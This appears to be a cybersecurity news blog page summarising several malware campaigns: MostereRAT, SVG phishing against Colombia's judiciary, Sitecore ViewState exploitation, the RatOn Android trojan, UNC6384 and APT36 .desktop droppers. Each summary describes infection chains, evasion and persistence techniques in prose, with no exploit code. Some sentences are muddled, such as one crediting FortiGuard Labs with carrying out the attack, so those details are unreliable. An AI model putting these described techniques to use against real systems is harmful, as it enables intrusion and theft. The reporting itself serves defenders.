MostereRAT Malware Leverages Evasion Tactics to Foil Defenders

 


Despite the fact that cybercrime has become increasingly sophisticated over the years, security researchers have uncovered a stealthy phishing campaign in which a powerful malware strain called MostereRAT was deployed. This remote access trojan allows attackers to take full control of infected systems in the same way they would normally operate them, as though they were physically a part of them. 

It has recently been revealed that the campaign is being carried out by Fortinet's FortiGuard Labs using an array of advanced evasion techniques to bypass traditional defenses and remain undetected for extended periods of time. This operation was characterized by the unconventional use of Easy Programming Language (EPL) as a visual programming tool in China that is seldom used to carry out such operations. 

Through its use, staged payloads were constructed, malicious activity was obscured, and security systems were systematically disabled. Researchers report that these phishing emails, which are primarily targeted at Japanese users with business related lures, have been shown to lead victims to booby-trapped documents embedded within ZIP archives, and this ultimately allowed the deployment of MostereRAT to be possible. 

A malware campaign designed to siphon sensitive information from a computer is incredibly sophisticated, as it extends its reach by installing secondary plugins, secures its communication with mutual TLS (mTLS), and even installs additional remote access utilities once inside a computer, highlighting the campaign's calculated design and danger of adaptability once it enters the system. 

As FortiGuard Labs identified the threat, it is believed that the campaign distinguishes itself by its layered approach to advanced evasion techniques that can make it very difficult for it to be detected. It is noteworthy that the code is written in a language called Easy Programming Language (EPL) — a simplified Chinese based programming language that is rarely used in cyberattacks — allowing attackers to conceal the malicious activity by staging the payload in multiple steps. 

With MostereRAT, a command-and-control system can be installed on an enterprise network, and it demonstrates that when deployed, it can disable security tools, block antivirus traffic, and establish encrypted communications with the C2 infrastructure, all of which are accomplished through mutual TLS (mTLS). Infection chains are initiated by phishing emails that are crafted to appear legitimate business inquiries, with a particular emphasis on Japanese users. 

In these messages, unsuspecting recipients are directed to download a Microsoft Word file that contains a hidden ZIP archive, which in turn executes a hidden payload in the form of a hidden file. Decrypting the executable's components, installing them in the system directory, and setting up persistence mechanisms, some of which operate at SYSTEM-level privileges, so that control can be maximized. 

Moreover, the malware displays a deceptive message in Simplified Chinese claiming that the file is incompatible in order to further disguise its presence. This tactic serves as a means of deflecting suspicion while encouraging recipients to try to access the file in a more secure manner. As well as these findings, researchers noted that the attack flows and associated C2 domains have been traced to infrastructure first reported by a security researcher in 2020, as part of a banking trojan. 

However, as the threat has evolved, it has evolved into a fully-fledged remote access program called MostereRAT. 

Yurren Wan, the researcher at FortiGuard Labs, emphasized that the campaign was of a high severity, primarily because it integrated multiple advanced techniques in order to allow adversaries to stay undetected while in control of compromised systems, while maintaining complete control of the system at the same time. 

Using legitimate remote access tools to disguise their activity, attackers are able to operate in plain sight by enabling security defenses and disguising activity. It was noted by Wan that one of the most distinctive aspects of this campaign is its use of unconventional methods. For example, it is coded in Easy Programming Language (EPL), intercepts and blocks antivirus traffic at the network level, and can even escalate privileges to the level of Trusted Installer—capabilities that are rarely found in standard malware attacks. 

A MostereRAT exploit can be used to record keystrokes, exfiltrate sensitive data, create hidden administrator accounts, and make use of tools such as AnyDesk and TightVNC in order to maintain persistence over the long term over a target system once it becomes active. According to Wan, defense against such intrusions requires a layered approach that combines advanced technical safeguards with sustained user awareness. 

Additionally, he said that companies should ensure that their FortiGate, FortiClient, and FortiMail deployments are protected by the latest FortiGuard security patches, while channel partners can do the same by providing guidance to customers on how to implement a managed detection and response strategy (MDR) as well as encouraging them to take advantage of training courses such as the free Fortinet Certified Fundamentals (FCF) course in order to strengthen defenses further. 

At Deepwatch, Lauren Rucker, senior cyber threat intelligence analyst, emphasized that browser security is a crucial line of defense against phishing emails that are at the heart of the campaign. In the meantime, the risk of escalation to SYSTEM or TrustedInstaller can be reduced significantly if automatic downloads are restricted and user privilege controls are tightened. As soon as MostereRAT has been installed, it utilizes multiple techniques to undermine computer security. 

As a result of mostereRAT, Microsoft Updates have been disabled, antivirus processes have been terminated, and security software cannot communicate with their servers. By impersonating the highly privileged TrustedInstaller account, the malware escalates privileges, allowing attackers to take over the system almost completely. 

James Maude, the acting chief technology officer at BeyondTrust, explained that the campaign relies on exploiting overprivileged users and endpoints that don't have strong application control as a result of combining obscure scripting languages with trusted remote access tools. 

ManyereRAT is known for maintaining extensive lists of targeted security products, such as 360 Safe, Kingsoft Antivirus, Tencent PC Manager, Windows Defender, ESET, Avira, Avast, and Malwarebytes, among others. This application utilizes Windows Filtering Platform (WFP) filters in order to block network traffic from these tools, effectively preventing them from reaching their vendors' servers to send detection alerts or telemetry. 

In addition, researchers found that another of the malware's core modules, elsedll.db, enabled robust remote access to remote computers by utilizing mutual TLS (mTLS) authentication, and supported 37 distinct commands ranging from file manipulation and payload delivery to screen capture and user identification. It is very concerning that the malware is deliberately installing and configuring legitimate software tools like AnyDesk, TightVNC, and RDP Wrapper to create hidden backdoors for long-term usage. 

To maintain exclusive control over these utilities, attackers stealthily modify the registry, conceal themselves as much as possible, and remain invisible to system users. The experts warn that the campaign represents an important evolution in remote access trojans in that it combined advanced evasion techniques with social engineering as well as legitimate tool abuse to achieve persistent compromise, highlighting the importance of maintaining a high level of security, enforcing strict endpoint controls, and providing ongoing user awareness training in order to avoid persistent compromise. 

There has been a significant evolution in cybercriminal operations, with many campaigns combining technical innovation with thoughtful planning, since the discovery of MostereRAT underscores the fact that cybercriminals have stepped beyond rudimentary malware to create sophisticated campaigns. As a company, the real challenge will be to not only deploy updated security products, but also adopt a layered, forward-looking defense strategy that anticipates such threats before they become a problem. 

A number of measures, such as tightening user privilege policies, improving browser security, as well as increasing endpoint visibility, can help minimize exposure, however, regular awareness programs remain crucial in order to reduce the success rate of phishing lures and prevent them from achieving maximum success. 

Furthermore, by partnering with managed security providers, organizations can gain access to expertise in detection, response, and continuous monitoring that are difficult to maintain in-house by most organizations. It is clear that adversaries will continue to exploit overlooked vulnerabilities and legitimate tools to their advantage in the future, which is why threats like MostereRAT are on the rise. 

In this environment, resilient defenses and cyber capabilities require more than reactive fixes; they require a culture of preparedness, disciplining operational practices, and a commitment to stay one step ahead within the context of a threat landscape that continues to grow rapidly.
Read more »
VirusTotal
Colombia JavaScript malware phishing SVG VirusTotal

SVG Phishing Campaign Bypasses Antivirus, Targets Colombian Judiciary

 

VirusTotal has uncovered a sophisticated phishing campaign that leverages SVG (Scalable Vector Graphics) files to bypass traditional antivirus detection while impersonating Colombia's judicial system. The campaign was discovered after VirusTotal added SVG support to its AI Code Insight platform, which uses machine learning to analyze suspicious behavior in uploaded files. 

Campaign discovery and scale 

The malicious SVG files initially showed zero detections by conventional antivirus scans but were flagged by VirusTotal's AI-powered Code Insight feature for suspicious JavaScript execution and HTML rendering capabilities. Following the initial discovery, VirusTotal identified 523 previously uploaded SVG files that were part of the same campaign, all of which had evaded detection by traditional security software. 

Modus operandi 

The SVG files exploit the element to display HTML content and execute JavaScript when loaded. These files create convincing fake portals impersonating Colombia's Fiscalía General de la Nación (Office of the Attorney General), complete with case numbers, security tokens, and official government branding to build victim trust. 

When users interact with these fake portals, they see a phony download progress bar that simulates an official government document download process. While victims believe they are downloading legitimate legal documents, the malware simultaneously triggers the download of a password-protected ZIP archive in the background . 

Malware payload

Analysis of the extracted ZIP files reveals a multi-component attack containing four files: a legitimate Comodo Dragon web browser executable renamed to appear as an official judicial document, a malicious DLL, and two encrypted files. When the user opens the executable, the malicious DLL is sideloaded to install additional malware on the system. 

Evasion techniques

The campaign demonstrates sophisticated evasion tactics including obfuscation, polymorphism, and substantial amounts of dummy code designed to increase file entropy and avoid static detection methods. The attackers evolved their payloads over time, with earlier samples being larger (around 25 MB) and later versions becoming more streamlined. 

Detection challenges

SVG files present unique security challenges because they can contain executable JavaScript while appearing as harmless image files to users and many security tools. Traditional antivirus solutions struggle to analyze the XML-based SVG format effectively, making AI-powered behavioral analysis crucial for detection. 

The campaign highlights the growing trend of threat actors exploiting SVG files for phishing attacks, as these files can embed malicious scripts that execute automatically while maintaining the appearance of legitimate graphics. VirusTotal's AI Code Insight platform proved essential in exposing this campaign, demonstrating how machine learning can identify threats that traditional signature-based detection methods miss .
Read more »
zero-day
AI Cloud Internet malware WeepSteel zero-day

Hackers Exploit Zero-Day Bug to Install Backdoors and Steal Data


Sitecore bug abused

Threat actors exploited a zero-day bug in legacy Sitecore deployments to install WeepSteel spying malware. 

The bug, tracked as CVE-2025-53690, is a ViewState deserialization flaw caused by the addition of a sample ASP.NET machine key in pre-2017 Sitecore guides. 

A few users reused this key, which allowed hackers who knew about the key to create valid, but infected '_VIEWSTATE' payloads that fooled the server into deserializing and executing them, which led to remote code execution (RCE). 

The vulnerability isn’t a bug in ASP.NET; however, it is a misconfiguration flaw due to the reuse of publicly documented keys that were never intended for production use.

About exploitation

Mandiant experts found the exploit in the wild and said that the threat actors have been exploiting the bug in various multi-stage attacks. Threat actors target the '/sitecore/blocked.Aspx' endpoint, which consists of an unauthorized ViewState field, and get RCE by exploiting CVE-2025-53690. 

The malicious payload threat actors deploy is WeepSteel, a spying backdoor that gets process, system, disk, and network details, hiding its exfiltration as standard ViewState responses. Mendiant experts found the RCE of monitoring commands on compromised systems- tasklist, ipconfig/all, whoami, and netstat-ano. 

Mandiant observed the execution of reconnaissance commands on compromised environments, including whoami, hostname, tasklist, ipconfig /all, and netstat -ano. 

In the next attack stage, the threat actors installed Earthworm (a network tunneling and reverse SOCKS proxy), Dwagent (a remote access tool), and 7-Zip, which is used to make archives of the stolen information. After this, the threat actors increased access privileges by making local administrator accounts ('asp$,' 'sawadmin'), “cached (SAM and SYSTEM hives) credentials dumping, and attempted token impersonating via GoTokenTheft,” Bleeping Computer said. 

Threat actors secured persistence by disabling password expiration, which gave them RDP access and allowed them to register Dwagent as a SYSTEM service. 

“Mandiant recommends following security best practices in ASP.NET, including implementing automated machine key rotation, enabling View State Message Authentication Code (MAC), and encrypting any plaintext secrets within the web.config file,” the company said.

Read more »
Trojan
Android cryptocurrency malware MFA NFC Ransomware RatON TikTok Trojan

RatOn Android Trojan Expands Into Full Remote Access Threat Targeting Banks and Crypto

 



A new Android malware strain called RatOn has rapidly evolved from a tool limited to NFC relay attacks into a sophisticated remote access trojan with the ability to steal banking credentials, hijack cryptocurrency wallets, and even lock users out of their phones with ransom-style screens. Researchers warn the malware is under active development and combines multiple attack methods rarely seen together in one mobile threat.

How It Spreads

RatOn is being distributed through fake websites designed to look like the Google Play Store. Some of these pages advertise an adult-themed version of TikTok called “TikTok 18+.” Once victims install the dropper app, it requests permission to install software from unknown sources, bypassing Android’s built-in safeguards. The second-stage payload then seeks administrator and accessibility permissions, along with access to contacts and system settings, giving it deep control of the device. From there, RatOn can download an additional component called NFSkate, a modified version of the NFCGate tool, enabling advanced relay attacks known as “ghost taps.”


Capabilities and Tactics

The trojan’s abilities are wide-ranging:

1. Overlays and ransomware screens: RatOn can display fake login pages to steal credentials or lock the device with alarming ransom notes. Some overlays falsely accuse users of viewing child exploitation content and demand $200 in cryptocurrency within two hours to regain access.

2. Banking and crypto theft: It specifically targets cryptocurrency wallets such as MetaMask, Trust Wallet, Blockchain.com, and Phantom. By capturing PIN codes and recovery phrases, the malware enables attackers to take over accounts and steal assets. It can also perform automated transfers inside George ÄŒesko, a Czech banking app, by simulating taps and inputs.

3. NFC relay attacks: Through NFSkate, RatOn can remotely use victims’ card data for contactless payments.

4. Remote commands: The malware can change device settings, send fake push notifications, send SMS messages, add contacts, record screens, launch apps like WhatsApp and Facebook, lock the phone, and update its target list of financial apps.

Researchers noted RatOn shares no code with other Android banking trojans and appears to have been built from scratch. A similar trend has been seen before: the HOOK trojan, another Android threat, also experimented with ransomware-style overlays.


Development and Targets

The first sample of RatOn was detected on July 5, 2025, with further versions appearing as recently as August 29, pointing to ongoing development. Current attacks focus mainly on users in the Czech Republic and Slovakia. Investigators believe the need for local bank account numbers in automated transfers suggests possible collaboration with regional money mules.


Why It Matters

RatOn’s integration of overlay fraud, ransomware intimidation, NFC relay, and automated transfers makes it unusually powerful. By combining old tactics with new automation, it raises the risk of large-scale theft from both traditional banking users and cryptocurrency holders.

Users can reduce exposure by downloading apps only from official stores, refusing risky permissions for unknown apps, keeping devices updated, and using strong multi-factor authentication on financial accounts. For cryptocurrency, hardware wallets that keep recovery phrases offline provide stronger protection. Anyone who suspects infection should immediately alert their bank and seek professional removal help.


Read more »
trending cybersecurity news
2025 trends malware Malware Campaign trending cybersecurity news

Chinese Espionage Group Exploits Fake Wi-Fi Portals to Infiltrate Diplomatic Networks

 

A recent investigation by Google’s security researchers has revealed a cyber operation linked to China that is targeting diplomats in Southeast Asia. The group behind the activity, tracked as UNC6384, has been found hijacking web traffic through deceptive Wi-Fi login pages. 

Instead of providing legitimate internet access, these portals imitated VPN sign-ins or software updates. Unsuspecting users were then tricked into downloading a file known as STATICPLUGIN. That downloader served as the delivery mechanism for SOGU.SEC, a newly modified version of the notorious PlugX malware, long associated with Chinese state-backed operations. What makes this campaign particularly dangerous is the use of a legitimate digital certificate to sign the malware. 

This allowed it to slip past traditional endpoint defenses. Once active, the backdoor enabled data theft, internal movement across networks, and persistent monitoring of sensitive systems. Google noted that the attackers relied on adversary-in-the-middle techniques to blend malicious activity with regular network traffic. 

Redirectors controlled by the group were used to reroute connections through their fake portals, ensuring victims remained unaware of the compromise. The choice of targets reflects Beijing’s broader regional ambitions. Diplomatic staff and foreign service officers often handle classified information relating to alliances, trade talks, and geopolitical strategies. 

By embedding malware within these systems, the attackers could gain visibility into negotiations and policy planning. Google has notified organizations it identified as victims and added the malicious infrastructure to its Safe Browsing alerts, aiming to block future attempts.
Read more »
phishing cyber attack
.desktop file abuse Advanced Persistent Threat APT36 hackers cyber espionage India Linux malware phishing cyber attack

APT36 Exploits Linux .desktop Files for Espionage Malware in Ongoing Cyber Attacks

 


The Pakistani threat group APT36 has launched new cyber-espionage attacks targeting India’s government and defense sectors by abusing Linux .desktop files to deploy malware.

According to recent reports from CYFIRMA and CloudSEK, the campaign—first detected on August 1, 2025—is still active. Researchers highlight that this activity focuses on data theft, long-term surveillance, and persistent backdoor access. Notably, APT36 has a history of using .desktop files in espionage operations across South Asia.
Abuse of Linux Desktop Files

Victims receive phishing emails containing ZIP archives with a disguised .desktop file masquerading as a PDF. Once opened, the file triggers a hidden bash command that fetches a hex-encoded payload from an attacker-controlled server or Google Drive, writes it into /tmp/, makes it executable with chmod +x, and launches it in the background.

To avoid suspicion, the malware also opens Firefox to display a decoy PDF hosted online. Attackers manipulated fields like Terminal=false to hide terminal windows and X-GNOME-Autostart-enabled=true for persistence at every login.

While .desktop files are typically harmless text-based launchers defining icons and commands, APT36 weaponized them as malware droppers and persistence mechanisms—a method similar to how Windows LNK shortcuts are exploited.

The dropped malware is a Go-based ELF executable with espionage capabilities. Despite obfuscation, researchers confirmed it can:
  • Remain hidden,
  • Achieve persistence via cron jobs and systemd services,
  • Establish C2 communication through a bi-directional WebSocket channel for remote command execution and data exfiltration.
Both cybersecurity firms conclude that APT36 is evolving its tactics, becoming increasingly evasive, stealthy, and sophisticated, making detection on Linux environments difficult since .desktop abuse is rarely monitored by security tools.
Read more »
Subscribe to: Comments (Atom)